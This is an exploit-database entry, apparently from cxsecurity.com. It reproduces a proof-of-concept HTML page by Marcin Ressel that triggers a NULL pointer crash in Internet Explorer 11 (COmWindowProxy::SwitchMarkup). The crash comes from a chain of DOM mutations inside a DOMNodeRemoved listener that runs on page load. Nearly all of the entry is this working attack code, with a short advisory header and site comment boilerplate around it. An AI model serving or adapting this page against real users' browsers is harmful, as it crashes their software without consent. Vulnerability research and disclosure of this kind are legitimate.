IE 11 COmWindowProxy::SwitchMarkup NULL PTR

2015.12.10
Credit: Marcin Ressel
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<!doctype html> <html> <head> <meta http-equiv='Cache-Control' content='no-cache'/> <title>IE11 11.0.9600.18097 NULL PTR</title> <script> /* * Exploit Title: IE 11 COmWindowProxy::SwitchMarkup NULL PTR * Date: 09.12.2015 * Exploit Author: Marcin Ressel * Vendor Homepage: www.microsoft.com * Software Link: 0 * Version: 11.0.9600.18097 * Tested on: Windows 7 x64 * https://twitter.com/m_ressel */ var trg,src,arg; function tk() { targetDomTree = document.getElementsByTagName("*"); var meta = document.createElement('meta'); meta.setAttribute("http-equiv", "X-UA-Compatible"); meta.setAttribute("content",'IE=10'); document.getElementsByTagName("head")[0].appendChild(meta); doc = document; src = targetDomTree[8]; trg = targetDomTree[1]; arg = targetDomTree[0]; arg.addEventListener("DOMNodeRemoved",new Function("", 'try{src.runtimeStyle.textAlignLast="center";}catch(err){}'+ 'try{trg = arg.removeNode(true);}catch(err){}'+ 'try{trg.parentNode.style.textAutospace="ideograph-numeric";}catch(err){}'+ 'try{trg.runtimeStyle="align-items:stretch;";}catch(err){}'+ 'try{trg.insertAdjacentHTML("afterEnd","<table><tfoot>http://www.w3.org/2000/xmlns/</tfoot></table>");}catch(err){}'+ 'try{trg.parentElement.parentNode.style.wordWrap="initial";}catch(err){}'+ 'try{trg.parentNode.style.writingMode="vertical-rl";}catch(err){}'+ 'try{doc.write("");}catch(err){}try{trg.style.whiteSpace="pre"; }catch(err){}' ), true); trg.outerText = new Object(); trg.parentNode.appendChild(document.createElement("div")); } </script> </head> <body onload='tk();'> <div id="out">..</div> <div id="oneUnArg">...</div> <div id="pHolder"></div> </body> </html>

References:

https://twitter.com/m_ressel


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top